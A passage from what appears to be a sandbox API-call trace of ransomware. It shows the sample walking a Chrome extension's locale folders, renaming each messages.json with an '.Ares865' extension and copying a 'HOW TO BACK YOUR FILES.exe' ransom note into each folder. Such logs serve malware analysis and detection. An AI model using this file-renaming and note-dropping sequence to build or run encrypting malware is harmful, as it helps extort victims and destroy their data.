Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja" [0103.425] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja" [0103.425] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.426] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.426] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.426] GetLastError () returned 0x0 [0103.427] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.427] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86585990, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4ef918a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ef918a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.427] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.427] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.427] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\messages.json.Ares865") returned 160 [0103.427] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.428] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.429] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=221) returned 1 [0103.432] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it" [0103.433] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it" [0103.433] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.433] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.433] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.434] GetLastError () returned 0x0 [0103.434] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.434] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86585990, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4ef918a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ef918a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.434] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.434] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.434] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\messages.json.Ares865") returned 160 [0103.434] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.436] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.436] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=213) returned 1 [0103.440] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id" [0103.440] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id" [0103.440] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.440] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.440] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.441] GetLastError () returned 0x0 [0103.441] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.441] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86585990, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4ef918a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ef918a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.441] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.441] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.441] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\messages.json.Ares865") returned 160 [0103.441] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.443] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.443] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=209) returned 1 [0103.447] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu" [0103.447] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu" [0103.447] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.447] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.448] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.448] GetLastError () returned 0x0 [0103.448] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.448] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86585990, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4efb7a00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4efb7a00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.448] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.448] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.449] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\messages.json.Ares865") returned 160 [0103.449] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.450] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.450] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=235) returned 1 [0103.454] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi" [0103.454] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi" [0103.454] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.454] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.455] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.455] GetLastError () returned 0x0 [0103.455] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.455] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86585990, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4efb7a00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4efb7a00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.455] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.455] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.455] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\messages.json.Ares865") returned 160 [0103.455] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.457] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.457] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=279) returned 1 [0103.462] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he" [0103.462] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he" [0103.462] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.462] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.463] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, 